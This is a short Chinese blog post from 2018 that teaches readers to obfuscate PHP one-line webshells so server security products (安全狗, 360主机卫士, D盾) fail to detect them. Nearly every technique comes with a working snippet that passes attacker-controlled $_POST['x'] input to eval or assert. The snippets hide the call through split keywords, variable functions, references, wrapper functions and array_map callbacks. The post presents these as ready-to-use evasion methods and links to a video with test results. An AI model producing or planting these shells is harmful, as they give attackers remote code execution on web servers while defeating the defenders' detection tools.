php免杀教程【绝对原创】
2018-11-17 15:53 狼人:-) 阅读(526) 评论(0) 编辑 收藏 举报这个绝对原创! + 首发!
个人认为免杀大致分为这几个方面:
1.关键字拆分。
比如assert,可以写成 \'a\'.\'ss\'.\'e\'.\'r\'.\'t\'这样。
2.可变变量、引用、可变函数。
可变变量 比如$a=$_POST[\'x\'];$b=\'a\';@eval($$b);
引用 比如$a=$_POST[\'x\'];$b=&$a;@eval($b);
可变函数 比如$a=\'a\'.\'ss\'.\'e\'.\'r\'.\'t\';$a($_POST[\'x\']);
3.添加其他代码。
添加其他代码 比如 if(empty($a))
{
$a=$_POST[\'x\'];
}
@eval($a);
4.函数替换。
使用其他函数,比如eval可以使用assert替换。
5.封装到新的函数中。
新定义一个函数,使其封装到新函数中。
function test($a){ //定义一个名为test的函数,并使用$a接受参数
eval($a);
}
test($_POST[\'x\']);
6.函数回调。
使用其他函数进行调用,并执行。
如:array_map(\'a\'.\'s\'.\'se\'.\'r\'.\'t\',array($_POST[\'x\']));
详细教程 + 测试结果(安全狗+360主机卫士+D盾) 请看视频教程。
视频教程下载地址:http://pan.baidu.com/s/1boKws83
本文来源地址:http://bbs.ichunqiu.com/thread-8964-1-1.html?from=bjy